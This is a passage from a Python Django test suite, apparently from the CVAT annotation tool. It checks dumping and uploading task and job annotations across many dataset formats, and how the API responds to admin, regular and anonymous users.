img[:, :, 2] = 0.5 + 0.5 * np.sin(2 * np.pi * (2 / 3 + frame_i / total_frames))
img = np.round(255 * img).astype(np.uint8)
img = np.clip(img, 0, 255)
frame = av.VideoFrame.from_ndarray(img, format='rgb24')
for packet in stream.encode(frame):
container.mux(packet)
# Flush stream
for packet in stream.encode():
container.mux(packet)
# Close the file
container.close()
f.name = filename
f.seek(0)
return [(width, height)] * total_frames, f
class ForceLogin:
def __init__(self, user, client):
self.user = user
self.client = client
def __enter__(self):
if self.user:
self.client.force_login(self.user,
backend='django.contrib.auth.backends.ModelBackend')
return self
def __exit__(self, exception_type, exception_value, traceback):
if self.user:
self.client.logout()
class _DbTestBase(APITestCase):
def setUp(self):
self.client = APIClient()
@classmethod
def setUpTestData(cls):
cls.create_db_users()
@classmethod
def create_db_users(cls):
(group_admin, _) = Group.objects.get_or_create(name="admin")
(group_user, _) = Group.objects.get_or_create(name="user")
user_admin = User.objects.create_superuser(username="admin", email="",
password="admin")
user_admin.groups.add(group_admin)
user_dummy = User.objects.create_user(username="user", password="user")
user_dummy.groups.add(group_user)
cls.admin = user_admin
cls.user = user_dummy
def _put_api_v1_task_id_annotations(self, tid, data):
with ForceLogin(self.admin, self.client):
response = self.client.put("/api/v1/tasks/%s/annotations" % tid,
data=data, format="json")
return response
def _put_api_v1_job_id_annotations(self, jid, data):
with ForceLogin(self.admin, self.client):
response = self.client.put("/api/v1/jobs/%s/annotations" % jid,
data=data, format="json")
return response
@staticmethod
def _generate_task_images(count): # pylint: disable=no-self-use
images = {"client_files[%d]" % i: generate_image_file("image_%d.jpg" % i) for i in range(count)}
images["image_quality"] = 75
return images
@staticmethod
def _generate_task_videos(count): # pylint: disable=no-self-use
videos = {"client_files[%d]" % i: generate_video_file("video_%d.mp4" % i) for i in range(count)}
videos["image_quality"] = 75
return videos
def _create_task(self, data, image_data):
with ForceLogin(self.user, self.client):
response = self.client.post('/api/v1/tasks', data=data, format="json")
assert response.status_code == status.HTTP_201_CREATED, response.status_code
tid = response.data["id"]
response = self.client.post("/api/v1/tasks/%s/data" % tid,
data=image_data)
assert response.status_code == status.HTTP_202_ACCEPTED, response.status_code
response = self.client.get("/api/v1/tasks/%s" % tid)
task = response.data
return task
def _get_jobs(self, task_id):
with ForceLogin(self.admin, self.client):
response = self.client.get("/api/v1/tasks/{}/jobs".format(task_id))
return response.data
def _get_request(self, path, user):
with ForceLogin(user, self.client):
response = self.client.get(path)
return response
def _get_data_from_task(self, task_id, include_images):
task_ann = TaskAnnotation(task_id)
task_ann.init_from_db()
task_data = TaskData(task_ann.ir_data, Task.objects.get(pk=task_id))
extractor = CvatTaskDataExtractor(task_data, include_images=include_images)
return Dataset.from_extractors(extractor)
def _get_request_with_data(self, path, data, user):
with ForceLogin(user, self.client):
response = self.client.get(path, data)
return response
def _put_request_with_data(self, path, data, user):
with ForceLogin(user, self.client):
response = self.client.put(path, data)
return response
def _delete_request(self, path, user):
with ForceLogin(user, self.client):
response = self.client.delete(path)
return response
def _create_annotations(self, task, name_ann, key_get_values):
tmp_annotations = copy.deepcopy(annotations[name_ann])
# change attributes in all annotations
for item in tmp_annotations:
if item in ["tags", "shapes", "tracks"]:
for index_elem, _ in enumerate(tmp_annotations[item]):
tmp_annotations[item][index_elem]["label_id"] = task["labels"][0]["id"]
for index_attribute, attribute in enumerate(task["labels"][0]["attributes"]):
spec_id = task["labels"][0]["attributes"][index_attribute]["id"]
if key_get_values == "random":
if attribute["input_type"] == "number":
start = int(attribute["values"][0])
stop = int(attribute["values"][1]) + 1
step = int(attribute["values"][2])
value = str(random.randrange(start, stop, step))
else:
value = random.choice(task["labels"][0]["attributes"][index_attribute]["values"])
elif key_get_values == "default":
value = attribute["default_value"]
if item == "tracks" and attribute["mutable"]:
for index_shape, _ in enumerate(tmp_annotations[item][index_elem]["shapes"]):
tmp_annotations[item][index_elem]["shapes"][index_shape]["attributes"].append({
"spec_id": spec_id,
"value": value,
})
else:
tmp_annotations[item][index_elem]["attributes"].append({
"spec_id": spec_id,
"value": value,
})
response = self._put_api_v1_task_id_annotations(task["id"], tmp_annotations)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def _create_annotations_in_job(self, task, job_id, name_ann, key_get_values):
tmp_annotations = copy.deepcopy(annotations[name_ann])
# change attributes in all annotations
for item in tmp_annotations:
if item in ["tags", "shapes", "tracks"]:
for index_elem, _ in enumerate(tmp_annotations[item]):
tmp_annotations[item][index_elem]["label_id"] = task["labels"][0]["id"]
for index_attribute, attribute in enumerate(task["labels"][0]["attributes"]):
spec_id = task["labels"][0]["attributes"][index_attribute]["id"]
if key_get_values == "random":
if attribute["input_type"] == "number":
start = int(attribute["values"][0])
stop = int(attribute["values"][1]) + 1
step = int(attribute["values"][2])
value = str(random.randrange(start, stop, step))
else:
value = random.choice(task["labels"][0]["attributes"][index_attribute]["values"])
elif key_get_values == "default":
value = attribute["default_value"]
if item == "tracks" and attribute["mutable"]:
for index_shape, _ in enumerate(tmp_annotations[item][index_elem]["shapes"]):
tmp_annotations[item][index_elem]["shapes"][index_shape]["attributes"].append({
"spec_id": spec_id,
"value": value,
})
else:
tmp_annotations[item][index_elem]["attributes"].append({
"spec_id": spec_id,
"value": value,
})
response = self._put_api_v1_job_id_annotations(job_id, tmp_annotations)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def _download_file(self, url, data, user, file_name):
response = self._get_request_with_data(url, data, user)
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
response = self._get_request_with_data(url, data, user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
content = BytesIO(b"".join(response.streaming_content))
with open(file_name, "wb") as f:
f.write(content.getvalue())
def _upload_file(self, url, data, user):
response = self._put_request_with_data(url, {"annotation_file": data}, user)
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
response = self._put_request_with_data(url, {}, user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def _check_downloaded_file(self, file_name):
if not osp.exists(file_name):
raise FileNotFoundError(f"File '{file_name}' was not downloaded")
def _generate_url_dump_tasks_annotations(self, task_id):
return f"/api/v1/tasks/{task_id}/annotations"
def _generate_url_upload_tasks_annotations(self, task_id, upload_format_name):
return f"/api/v1/tasks/{task_id}/annotations?format={upload_format_name}"
def _generate_url_dump_job_annotations(self, job_id):
return f"/api/v1/jobs/{job_id}/annotations"
def _generate_url_upload_job_annotations(self, job_id, upload_format_name):
return f"/api/v1/jobs/{job_id}/annotations?format={upload_format_name}"
def _generate_url_dump_dataset(self, task_id):
return f"/api/v1/tasks/{task_id}/dataset"
def _remove_annotations(self, url, user):
response = self._delete_request(url, user)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
return response
class TaskDumpUploadTest(_DbTestBase):
def test_api_v1_dump_and_upload_annotations_with_objects_type_is_shape(self):
test_name = self._testMethodName
dump_formats = dm.views.get_export_formats()
upload_formats = dm.views.get_import_formats()
expected = {
self.admin: {'name': 'admin', 'code': status.HTTP_200_OK, 'create code': status.HTTP_201_CREATED,
'accept code': status.HTTP_202_ACCEPTED,'file_exists': True, 'annotation_loaded': True},
self.user: {'name': 'user', 'code': status.HTTP_200_OK, 'create code': status.HTTP_201_CREATED,
'accept code': status.HTTP_202_ACCEPTED, 'file_exists': True, 'annotation_loaded': True},
None: {'name': 'none', 'code': status.HTTP_401_UNAUTHORIZED, 'create code': status.HTTP_401_UNAUTHORIZED,
'accept code': status.HTTP_401_UNAUTHORIZED, 'file_exists': False, 'annotation_loaded': False},
}
with TestDir() as test_dir:
# Dump annotations with objects type is shape
for dump_format in dump_formats:
if not dump_format.ENABLED:
continue
dump_format_name = dump_format.DISPLAY_NAME
with self.subTest(format=dump_format_name):
images = self._generate_task_images(3)
# create task with annotations
if dump_format_name == "Market-1501 1.0":
task = self._create_task(tasks["market1501"], images)
elif dump_format_name in ["ICDAR Localization 1.0", "ICDAR Recognition 1.0"]:
task = self._create_task(tasks["icdar_localization_and_recognition"], images)
elif dump_format_name == "ICDAR Segmentation 1.0":
task = self._create_task(tasks["icdar_segmentation"], images)
else:
task = self._create_task(tasks["main"], images)
task_id = task["id"]
if dump_format_name in [
"MOT 1.1", "MOTS PNG 1.0", \
"PASCAL VOC 1.1", "Segmentation mask 1.1", \
"TFRecord 1.0", "YOLO 1.1", "ImageNet 1.0", \
"WiderFace 1.0", "VGGFace2 1.0", \
]:
self._create_annotations(task, dump_format_name, "default")
else:
self._create_annotations(task, dump_format_name, "random")
# dump annotations
url = self._generate_url_dump_tasks_annotations(task_id)
for user, edata in list(expected.items()):
user_name = edata['name']
file_zip_name = osp.join(test_dir, f'{test_name}_{user_name}_{dump_format_name}.zip')
data = {
"format": dump_format_name,
}
response = self._get_request_with_data(url, data, user)
self.assertEqual(response.status_code, edata['accept code'])
response = self._get_request_with_data(url, data, user)
self.assertEqual(response.status_code, edata['create code'])
data = {
"format": dump_format_name,
"action": "download",
}
response = self._get_request_with_data(url, data, user)
self.assertEqual(response.status_code, edata['code'])
if response.status_code == status.HTTP_200_OK:
content = BytesIO(b"".join(response.streaming_content))
with open(file_zip_name, "wb") as f:
f.write(content.getvalue())
self.assertEqual(osp.exists(file_zip_name), edata['file_exists'])
# Upload annotations with objects type is shape
for upload_format in upload_formats:
upload_format_name = upload_format.DISPLAY_NAME
if upload_format_name == "CVAT 1.1":
file_zip_name = osp.join(test_dir, f'{test_name}_admin_CVAT for images 1.1.zip')
else:
file_zip_name = osp.join(test_dir, f'{test_name}_admin_{upload_format_name}.zip')
if not upload_format.ENABLED or not osp.exists(file_zip_name):
continue
with self.subTest(format=upload_format_name):
if upload_format_name in [
"MOTS PNG 1.0", # issue #2925 and changed points values
]:
self.skipTest("Format is fail")
if osp.exists(file_zip_name):
for user, edata in list(expected.items()):
# remove all annotations from task (create new task without annotation)
images = self._generate_task_images(3)
if upload_format_name == "Market-1501 1.0":
task = self._create_task(tasks["market1501"], images)
elif upload_format_name in ["ICDAR Localization 1.0", "ICDAR Recognition 1.0"]:
task = self._create_task(tasks["icdar_localization_and_recognition"], images)
elif upload_format_name == "ICDAR Segmentation 1.0":
task = self._create_task(tasks["icdar_segmentation"], images)
else:
task = self._create_task(tasks["main"], images)
task_id = task["id"]
url = self._generate_url_upload_tasks_annotations(task_id, upload_format_name)
with open(file_zip_name, 'rb') as binary_file:
response = self._put_request_with_data(url, {"annotation_file": binary_file}, user)
self.assertEqual(response.status_code, edata['accept code'])
response = self._put_request_with_data(url, {}, user)
self.assertEqual(response.status_code, edata['create code'])
def test_api_v1_dump_annotations_with_objects_type_is_track(self):
test_name = self._testMethodName
dump_formats = dm.views.get_export_formats()
upload_formats = dm.views.get_import_formats()
expected = {
self.admin: {'name': 'admin', 'code': status.HTTP_200_OK, 'create code': status.HTTP_201_CREATED,
'accept code': status.HTTP_202_ACCEPTED, 'file_exists': True, 'annotation_loaded': True},
self.user: {'name': 'user', 'code': status.HTTP_200_OK, 'create code': status.HTTP_201_CREATED,
'accept code': status.HTTP_202_ACCEPTED, 'file_exists': True, 'annotation_loaded': True},
None: {'name': 'none', 'code': status.HTTP_401_UNAUTHORIZED, 'create code': status.HTTP_401_UNAUTHORIZED,
'accept code': status.HTTP_401_UNAUTHORIZED, 'file_exists': False, 'annotation_loaded': False},
}
with TestDir() as test_dir:
# Dump annotations with objects type is track
for dump_format in dump_formats:
if not dump_format.ENABLED:
continue
dump_format_name = dump_format.DISPLAY_NAME
with self.subTest(format=dump_format_name):
# create task with annotations
video = self._generate_task_videos(1)
if dump_format_name == "Market-1501 1.0":
task = self._create_task(tasks["market1501"], video)
elif dump_format_name in ["ICDAR Localization 1.0", "ICDAR Recognition 1.0"]:
task = self._create_task(tasks["icdar_localization_and_recognition"], video)
elif dump_format_name == "ICDAR Segmentation 1.0":
task = self._create_task(tasks["icdar_segmentation"], video)
else:
task = self._create_task(tasks["main"], video)
task_id = task["id"]
if dump_format_name in [
"MOT 1.1", "MOTS PNG 1.0", \
"PASCAL VOC 1.1", "Segmentation mask 1.1", \
"TFRecord 1.0", "YOLO 1.1", "ImageNet 1.0", \
"WiderFace 1.0", "VGGFace2 1.0", \
]:
self._create_annotations(task, dump_format_name, "default")
else:
self._create_annotations(task, dump_format_name, "random")
# dump annotations
url = self._generate_url_dump_tasks_annotations(task_id)
for user, edata in list(expected.items()):
user_name = edata['name']
file_zip_name = osp.join(test_dir, f'{test_name}_{user_name}_{dump_format_name}.zip')
data = {
"format": dump_format_name,
}
response = self._get_request_with_data(url, data, user)
self.assertEqual(response.status_code, edata['accept code'])
response = self._get_request_with_data(url, data, user)
self.assertEqual(response.status_code, edata['create code'])
data = {
"format": dump_format_name,
"action": "download",
}
response = self._get_request_with_data(url, data, user)
self.assertEqual(response.status_code, edata['code'])
if response.status_code == status.HTTP_200_OK:
content = BytesIO(b"".join(response.streaming_content))
with open(file_zip_name, "wb") as f:
f.write(content.getvalue())
self.assertEqual(osp.exists(file_zip_name), edata['file_exists'])
# Upload annotations with objects type is track
for upload_format in upload_formats:
upload_format_name = upload_format.DISPLAY_NAME
if upload_format_name == "CVAT 1.1":
file_zip_name = osp.join(test_dir, f'{test_name}_admin_CVAT for video 1.1.zip')
else:
file_zip_name = osp.join(test_dir, f'{test_name}_admin_{upload_format_name}.zip')
if not upload_format.ENABLED or not osp.exists(file_zip_name):
continue
with self.subTest(format=upload_format_name):
if upload_format_name in [
"MOTS PNG 1.0", # issue #2925 and changed points values
]:
self.skipTest("Format is fail")
if osp.exists(file_zip_name):
for user, edata in list(expected.items()):
# remove all annotations from task (create new task without annotation)
video = self._generate_task_videos(1)
if upload_format_name == "Market-1501 1.0":
task = self._create_task(tasks["market1501"], video)
elif upload_format_name in ["ICDAR Localization 1.0", "ICDAR Recognition 1.0"]:
task = self._create_task(tasks["icdar_localization_and_recognition"], video)
elif upload_format_name == "ICDAR Segmentation 1.0":
task = self._create_task(tasks["icdar_segmentation"], video)
else:
task = self._create_task(tasks["main"], video)
task_id = task["id"]
url = self._generate_url_upload_tasks_annotations(task_id, upload_format_name)
with open(file_zip_name, 'rb') as binary_file:
response = self._put_request_with_data(url, {"annotation_file": binary_file}, user)
self.assertEqual(response.status_code, edata['accept code'])
response = self._put_request_with_data(url, {}, user)
self.assertEqual(response.status_code, edata['create code'])
def test_api_v1_dump_tag_annotations(self):
dump_format_name = "CVAT for images 1.1"
data = {
"format": dump_format_name,
"action": "download",
}
test_cases = ['all' 'first']
expected = {
self.admin: {'name': 'admin', 'code': status.HTTP_200_OK, 'create code': status.HTTP_201_CREATED,
'accept code': status.HTTP_202_ACCEPTED, 'file_exists': True},
self.user: {'name': 'user', 'code': status.HTTP_200_OK, 'create code': status.HTTP_201_CREATED,
'accept code': status.HTTP_202_ACCEPTED, 'file_exists': True},
None: {'name': 'none', 'code': status.HTTP_401_UNAUTHORIZED, 'create code': status.HTTP_401_UNAUTHORIZED,
'accept code': status.HTTP_401_UNAUTHORIZED, 'file_exists': False},
}
for test_case in test_cases:
images = self._generate_task_images(10)
task = self._create_task(tasks["change overlap and segment size"], images)
task_id = task["id"]
jobs = self._get_jobs(task_id)
if test_case == "all":
for job in jobs:
self._create_annotations_in_job(task, job["id"], "CVAT for images 1.1 tag", "default")
else:
self._create_annotations_in_job(task, jobs[0]["id"], "CVAT for images 1.1 tag", "default")
for user, edata in list(expected.items()):
with self.subTest(format=f"{edata['name']}"):
with TestDir() as test_dir:
user_name = edata['name']
url = self._generate_url_dump_tasks_annotations(task_id)
file_zip_name = osp.join(test_dir, f'{user_name}.zip')
data = {
"format": dump_format_name,
}
response = self._get_request_with_data(url, data, user)
self.assertEqual(response.status_code, edata['accept code'])
response = self._get_request_with_data(url, data, user)
self.assertEqual(response.status_code, edata['create code'])
data = {
"format": dump_format_name,
"action": "download",
}
response = self._get_request_with_data(url, data, user)
self.assertEqual(response.status_code, edata['code'])
if response.status_code == status.HTTP_200_OK:
content = BytesIO(b"".join(response.streaming_content))
with open(file_zip_name, "wb") as f:
f.write(content.getvalue())
self.assertEqual(osp.exists(file_zip_name), edata['file_exists'])
def test_api_v1_dump_and_upload_annotations_with_objects_are_different_images(self):
test_name = self._testMethodName
dump_format_name = "CVAT for images 1.1"
upload_types = ["task", "job"]
images = self._generate_task_images(2)
task = self._create_task(tasks["main"], images)
task_id = task["id"]
for upload_type in upload_types:
with self.subTest(format=type):
with TestDir() as test_dir:
if upload_type == "task":
self._create_annotations(task, "CVAT for images 1.1 different types", "random")
else:
jobs = self._get_jobs(task_id)
job_id = jobs[0]["id"]
self._create_annotations_in_job(task, job_id, "CVAT for images 1.1 different types", "random")
url = self._generate_url_dump_tasks_annotations(task_id)
file_zip_name = osp.join(test_dir, f'{test_name}_{upload_type}.zip')
data = {
"format": dump_format_name,
"action": "download",
}
self._download_file(url, data, self.admin, file_zip_name)
self.assertEqual(osp.exists(file_zip_name), True)
self._remove_annotations(url, self.admin)
if upload_type == "task":
url_upload = self._generate_url_upload_tasks_annotations(task_id, "CVAT 1.1")
else:
jobs = self._get_jobs(task_id)
url_upload = self._generate_url_upload_job_annotations(jobs[0]["id"], "CVAT 1.1")
with open(file_zip_name, 'rb') as binary_file:
self._upload_file(url_upload, binary_file, self.admin)
response = self._get_request(f"/api/v1/tasks/{task_id}/annotations", self.admin)
self.assertEqual(len(response.data["shapes"]), 2)
self.assertEqual(len(response.data["tracks"]), 0)
def test_api_v1_dump_and_upload_annotations_with_objects_are_different_video(self):
test_name = self._testMethodName
dump_format_name = "CVAT for video 1.1"
upload_types = ["task", "job"]
video = self._generate_task_videos(1)
task = self._create_task(tasks["main"], video)
task_id = task["id"]
for upload_type in upload_types:
with self.subTest(format=type):
with TestDir() as test_dir:
if upload_type == "task":
self._create_annotations(task, "CVAT for images 1.1 different types", "random")
else:
jobs = self._get_jobs(task_id)
job_id = jobs[0]["id"]
self._create_annotations_in_job(task, job_id, "CVAT for images 1.1 different types", "random")
url = self._generate_url_dump_tasks_annotations(task_id)
file_zip_name = osp.join(test_dir, f'{test_name}_{upload_type}.zip')
data = {
"format": dump_format_name,
"action": "download",
}
self._download_file(url, data, self.admin, file_zip_name)
self.assertEqual(osp.exists(file_zip_name), True)
self._remove_annotations(url, self.admin)
if upload_type == "task":
url_upload = self._generate_url_upload_tasks_annotations(task_id, "CVAT 1.1")
else:
jobs = self._get_jobs(task_id)
url_upload = self._generate_url_upload_job_annotations(jobs[0]["id"], "CVAT 1.1")
with open(file_zip_name, 'rb') as binary_file:
self._upload_file(url_upload, binary_file, self.admin)
self.assertEqual(osp.exists(file_zip_name), True)
response = self._get_request(f"/api/v1/tasks/{task_id}/annotations", self.admin)
self.assertEqual(len(response.data["shapes"]), 0)
self.assertEqual(len(response.data["tracks"]), 2)
def test_api_v1_dump_and_upload_with_objects_type_is_track_and_outside_property(self):
test_name = self._testMethodName
dump_format_name = "CVAT for video 1.1"
video = self._generate_task_videos(1)
task = self._create_task(tasks["main"], video)
self._create_annotations(task, "CVAT for video 1.1 slice track", "random")
task_id = task["id"]
with TestDir() as test_dir:
url = self._generate_url_dump_tasks_annotations(task_id)
file_zip_name = osp.join(test_dir, f'{test_name}.zip')
data = {
"format": dump_format_name,
"action": "download",
}
self._download_file(url, data, self.admin, file_zip_name)
self.assertEqual(osp.exists(file_zip_name), True)
with open(file_zip_name, 'rb') as binary_file:
url = self._generate_url_upload_tasks_annotations(task_id, "CVAT 1.1")
self._upload_file(url, binary_file, self.admin)
def test_api_v1_dump_and_upload_with_objects_type_is_track_and_keyframe_property(self):
test_name = self._testMethodName
dump_format_name = "CVAT for video 1.1"
video = self._generate_task_videos(1)
task = self._create_task(tasks["main"], video)
self._create_annotations(task, "CVAT for video 1.1 slice track keyframe", "random")
task_id = task["id"]
with TestDir() as test_dir:
url = self._generate_url_dump_tasks_annotations(task_id)
file_zip_name = osp.join(test_dir, f'{test_name}.zip')
data = {
"format": dump_format_name,
"action": "download",
}
self._download_file(url, data, self.admin, file_zip_name)
self.assertEqual(osp.exists(file_zip_name), True)
with open(file_zip_name, 'rb') as binary_file:
url = self._generate_url_upload_tasks_annotations(task_id, "CVAT 1.1")
self._upload_file(url, binary_file, self.admin)
def test_api_v1_dump_upload_annotations_from_several_jobs(self):
test_name = self._testMethodName
dump_format_name = "CVAT for images 1.1"
images = self._generate_task_images(10)
task = self._create_task(tasks["change overlap and segment size"], images)
task_id = task["id"]
jobs = self._get_jobs(task_id)
for job in jobs:
self._create_annotations_in_job(task, job["id"], "CVAT for images 1.1 merge", "random")
with TestDir() as test_dir:
url = self._generate_url_dump_tasks_annotations(task_id)
file_zip_name = osp.join(test_dir, f'{test_name}.zip')
data = {
"format": dump_format_name,
"action": "download",
}
self._download_file(url, data, self.admin, file_zip_name)
self.assertEqual(osp.exists(file_zip_name), True)
# remove annotations
self._remove_annotations(url, self.admin)
url = self._generate_url_upload_tasks_annotations(task_id, "CVAT 1.1")
with open(file_zip_name, 'rb') as binary_file:
self._upload_file(url, binary_file, self.admin)
def test_api_v1_dump_annotations_with_objects_type_is_shape_from_several_jobs(self):
test_name = self._testMethodName
dump_format_name = "CVAT for images 1.1"
test_cases = ['all', 'first']
images = self._generate_task_images(10)
task = self._create_task(tasks["change overlap and segment size"], images)
task_id = task["id"]
for test_case in test_cases:
with TestDir() as test_dir:
jobs = self._get_jobs(task_id)
if test_case == "all":
for job in jobs:
self._create_annotations_in_job(task, job["id"], dump_format_name, "default")
else:
self._create_annotations_in_job(task, jobs[0]["id"], dump_format_name, "default")
url = self._generate_url_dump_tasks_annotations(task_id)
file_zip_name = osp.join(test_dir, f'{test_name}.zip')
data = {
"format": dump_format_name,
"action": "download",
}
self._download_file(url, data, self.admin, file_zip_name)
self.assertEqual(osp.exists(file_zip_name), True)
# remove annotations
self._remove_annotations(url, self.admin)
url = self._generate_url_upload_tasks_annotations(task_id, "CVAT 1.1")
with open(file_zip_name, 'rb') as binary_file:
self._upload_file(url, binary_file, self.admin)
def test_api_v1_export_dataset(self):
test_name = self._testMethodName
dump_formats = dm.views.get_export_formats()
expected = {
self.admin: {'name': 'admin', 'code': status.HTTP_200_OK, 'create code': status.HTTP_201_CREATED,
'accept code': status.HTTP_202_ACCEPTED, 'file_exists': True},
self.user: {'name': 'user', 'code': status.HTTP_200_OK, 'create code': status.HTTP_201_CREATED,
'accept code': status.HTTP_202_ACCEPTED, 'file_exists': True},
None: {'name': 'none', 'code': status.HTTP_401_UNAUTHORIZED, 'create code': status.HTTP_401_UNAUTHORIZED,
'accept code': status.HTTP_401_UNAUTHORIZED, 'file_exists': False},
}
with TestDir() as test_dir:
# Dump annotations with objects type is shape
for dump_format in dump_formats:
if not dump_format.ENABLED or dump_format.DISPLAY_NAME != "CVAT for images 1.1":
continue
dump_format_name = dump_format.DISPLAY_NAME
with self.subTest(format=dump_format_name):
images = self._generate_task_images(3)
# create task with annotations
if dump_format_name == "Market-1501 1.0":
task = self._create_task(tasks["market1501"], images)
elif dump_format_name in ["ICDAR Localization 1.0", "ICDAR Recognition 1.0"]:
task = self._create_task(tasks["icdar_localization_and_recognition"], images)
elif dump_format_name == "ICDAR Segmentation 1.0":
task = self._create_task(tasks["icdar_segmentation"], images)
else:
task = self._create_task(tasks["main"], images)
task_id = task["id"]
# dump annotations
url = self._generate_url_dump_dataset(task_id)
for user, edata in list(expected.items()):
user_name = edata['name']
file_zip_name = osp.join(test_dir, f'{test_name}_{user_name}_{dump_format_name}.zip')
data = {
"format": dump_format_name,
}
response = self._get_request_with_data(url, data, user)
self.assertEqual(response.status_code, edata["accept code"])
response = self._get_request_with_data(url, data, user)
self.assertEqual(response.status_code, edata["create code"])
data = {
"format": dump_format_name,
"action": "download",
}
response = self._get_request_with_data(url, data, user)
self.assertEqual(response.status_code, edata["code"])
if response.status_code == status.HTTP_200_OK:
content = BytesIO(b"".join(response.streaming_content))
with open(file_zip_name, "wb") as f:
f.write(content.getvalue())
self.assertEqual(response.status_code, edata['code'])
self.assertEqual(osp.exists(file_zip_name), edata['file_exists'])
def test_api_v1_dump_empty_frames(self):
dump_formats = dm.views.get_export_formats()
upload_formats = dm.views.get_import_formats()
with TestDir() as test_dir:
for dump_format in dump_formats:
if not dump_format.ENABLED:
continue
dump_format_name = dump_format.DISPLAY_NAME
with self.subTest(format=dump_format_name):
images = self._generate_task_images(3)
task = self._create_task(tasks["no attributes"], images)
task_id = task["id"]
self._create_annotations(task, "empty annotation", "default")
url = self._generate_url_dump_tasks_annotations(task_id)
file_zip_name = osp.join(test_dir, f'empty_{dump_format_name}.zip')
data = {
"format": dump_format_name,
"action": "download",
}
self._download_file(url, data, self.admin, file_zip_name)
self.assertEqual(osp.exists(file_zip_name), True)
for upload_format in upload_formats:
upload_format_name = upload_format.DISPLAY_NAME
if upload_format_name == "CVAT 1.1":
file_zip_name = osp.join(test_dir, 'empty_CVAT for images 1.1.zip')
else:
file_zip_name = osp.join(test_dir, f'empty_{upload_format_name}.zip')
if not osp.exists(file_zip_name) or not upload_format.ENABLED:
continue
with self.subTest(format=upload_format_name):
if upload_format_name in [
"MOTS PNG 1.0", # issue #2925 and changed points values
]:
self.skipTest("Format is fail")
images = self._generate_task_images(3)
task = self._create_task(tasks["no attributes"], images)
task_id = task["id"]
url = self._generate_url_upload_tasks_annotations(task_id, upload_format_name)
with open(file_zip_name, 'rb') as binary_file:
response = self._put_request_with_data(url, {"annotation_file": binary_file}, self.admin)
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
response = self._put_request_with_data(url, {}, self.admin)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertIsNone(response.data)
def test_api_v1_rewriting_annotations(self):
test_name = self._testMethodName
dump_formats = dm.views.get_export_formats()
with TestDir() as test_dir:
for dump_format in dump_formats:
if not dump_format.ENABLED:
continue
dump_format_name = dump_format.DISPLAY_NAME
with self.subTest(format=dump_format_name):
if dump_format_name in [
"MOTS PNG 1.0", # issue #2925 and changed points values
"Datumaro 1.0" # Datumaro 1.0 is not in the list of import format
]:
self.skipTest("Format is fail")
images = self._generate_task_images(3)
if dump_format_name == "Market-1501 1.0":
task = self._create_task(tasks["market1501"], images)
elif dump_format_name in ["ICDAR Localization 1.0", "ICDAR Recognition 1.0"]:
task = self._create_task(tasks["icdar_localization_and_recognition"], images)
elif dump_format_name == "ICDAR Segmentation 1.0":
task = self._create_task(tasks["icdar_segmentation"], images)
else:
task = self._create_task(tasks["main"], images)
task_id = task["id"]
if dump_format_name in [
"MOT 1.1", "MOTS PNG 1.0", \
"PASCAL VOC 1.1", "Segmentation mask 1.1", \
"TFRecord 1.0", "YOLO 1.1", "ImageNet 1.0", \
"WiderFace 1.0", "VGGFace2 1.0", \
]:
self._create_annotations(task, dump_format_name, "default")
else:
self._create_annotations(task, dump_format_name, "random")
task_ann = TaskAnnotation(task_id)
task_ann.init_from_db()
task_ann_prev_data = task_ann.data
url = self._generate_url_dump_tasks_annotations(task_id)
file_zip_name = osp.join(test_dir, f'{test_name}_{dump_format_name}.zip')
data = {
"format": dump_format_name,
"action": "download",
}
self._download_file(url, data, self.admin, file_zip_name)
self.assertEqual(osp.exists(file_zip_name), True)
self._remove_annotations(url, self.admin)
self._create_annotations(task, "CVAT for images 1.1 many jobs", "default")
if dump_format_name == "CVAT for images 1.1" or dump_format_name == "CVAT for video 1.1":
dump_format_name = "CVAT 1.1"
url = self._generate_url_upload_tasks_annotations(task_id, dump_format_name)
with open(file_zip_name, 'rb') as binary_file:
self._upload_file(url, binary_file, self.admin)
task_ann = TaskAnnotation(task_id)
task_ann.init_from_db()
task_ann_data = task_ann.data
self.assertEqual(len(task_ann_data["shapes"]), len(task_ann_prev_data["shapes"]))
def test_api_v1_tasks_annotations_dump_and_upload_many_jobs_with_datumaro(self):
test_name = self._testMethodName
upload_format_name = "CVAT 1.1"
include_images_params = (False, True)
dump_format_names = ("CVAT for images 1.1", "CVAT for video 1.1")
for dump_format_name, include_images in itertools.product(dump_format_names, include_images_params):
with self.subTest(f"{dump_format_name}_include_images_{include_images}"):
# create task with annotations
images = self._generate_task_images(13)
task = self._create_task(tasks["many jobs"], images)
self._create_annotations(task, f'{dump_format_name} many jobs', "default")
task_id = task["id"]
data_from_task_before_upload = self._get_data_from_task(task_id, include_images)
# dump annotations
url = self._generate_url_dump_tasks_annotations(task_id)
with TestDir() as test_dir:
file_zip_name = osp.join(test_dir, f'{test_name}_{dump_format_name}.zip')
data = {
"format": dump_format_name,
"action": "download",
}
self._download_file(url, data, self.admin, file_zip_name)
self._check_downloaded_file(file_zip_name)
# remove annotations
self._remove_annotations(url, self.admin)
# upload annotations
url = self._generate_url_upload_tasks_annotations(task_id, upload_format_name)
with open(file_zip_name, 'rb') as binary_file:
self._upload_file(url, binary_file, self.admin)
# equals annotations
data_from_task_after_upload = self._get_data_from_task(task_id, include_images)
compare_datasets(self, data_from_task_before_upload, data_from_task_after_upload)
def test_api_v1_tasks_annotations_dump_and_upload_with_datumaro(self):
test_name = self._testMethodName
# get formats
dump_formats = dm.views.get_export_formats()
include_images_params = (False, True)
for dump_format, include_images in itertools.product(dump_formats, include_images_params):
if dump_format.ENABLED:
dump_format_name = dump_format.DISPLAY_NAME
with self.subTest(dump_format_name):
if dump_format_name in [
"MOT 1.1",
"Datumaro 1.0", # not uploaded
"CamVid 1.0", # issue #2840 and changed points values
"MOTS PNG 1.0", # changed points values
"Segmentation mask 1.1", # changed points values
"ICDAR Segmentation 1.0", # changed points values
]:
self.skipTest("Format is fail")
# create task
images = self._generate_task_images(3)
if dump_format_name == "Market-1501 1.0":
task = self._create_task(tasks["market1501"], images)
elif dump_format_name in ["ICDAR Localization 1.0",
"ICDAR Recognition 1.0"]:
task = self._create_task(tasks["icdar_localization_and_recognition"], images)
